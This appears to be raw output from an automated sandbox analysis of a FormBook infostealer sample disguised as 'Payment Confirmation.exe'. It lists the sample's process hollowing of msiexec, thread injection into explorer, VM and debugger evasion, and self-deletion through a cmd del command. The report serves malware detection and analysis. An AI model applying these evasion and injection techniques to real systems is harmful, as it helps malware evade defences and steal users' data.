Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment Confirmation.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\Payment Confirmation.exe File created: C:\Users\user\AppData\Local\Temp\nse1E08.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@11/8
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00402053 CoCreateInstance,MultiByteToWideChar, 1_2_00402053
Source: C:\Users\user\Desktop\Payment Confirmation.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 1_2_00404292
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3800:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Unpacked PE file: 4.2.Payment Confirmation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000A525 push ecx; ret 1_2_1000A538
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041B87C push eax; ret 4_2_0041B882
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041B812 push eax; ret 4_2_0041B818
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041B81B push eax; ret 4_2_0041B882
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041CBE6 push dword ptr [2E339416h]; ret 4_2_0041CCB6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0453D0D1 push ecx; ret 11_2_0453D0E4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046B87C push eax; ret 11_2_0046B882
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046B812 push eax; ret 11_2_0046B818
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046B81B push eax; ret 11_2_0046B882
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046CBE6 push dword ptr [2E339416h]; ret 11_2_0046CCB6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046B7C5 push eax; ret 11_2_0046B818

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\Payment Confirmation.exe File created: C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\msiexec.exe Process created: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10008856 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_10008856
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Payment Confirmation.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Payment Confirmation.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 1908 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2880 Thread sleep time: -34000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_004088E0 rdtsc 4_2_004088E0
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00405E93 FindFirstFileA,FindClose, 1_2_00405E93
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_004054BD
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00402671 FindFirstFileA, 1_2_00402671
Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.414579080.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10009418 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_10009418
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10009418 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_10009418
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100098E2 GetProcessHeap, 1_2_100098E2
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_004088E0 rdtsc 4_2_004088E0
Enables debug privileges
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A402 mov eax, dword ptr fs:[00000030h] 1_2_1001A402
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A616 mov eax, dword ptr fs:[00000030h] 1_2_1001A616
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A6C7 mov eax, dword ptr fs:[00000030h] 1_2_1001A6C7
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A706 mov eax, dword ptr fs:[00000030h] 1_2_1001A706
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A744 mov eax, dword ptr fs:[00000030h] 1_2_1001A744
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04500050 mov eax, dword ptr fs:[00000030h] 11_2_04500050
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00409B50 LdrLoadDll, 4_2_00409B50
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10009B80 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_10009B80

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Payment Confirmation.exe Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 9B0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Payment Confirmation.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Payment Confirmation.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Payment Confirmation.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\Payment Confirmation.exe Memory written: C:\Users\user\Desktop\Payment Confirmation.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 3440
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.386546545.00000000008B8000.00000004.00000020.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100098FF cpuid 1_2_100098FF
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10012E30 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_10012E30
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 1_2_004030FB

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY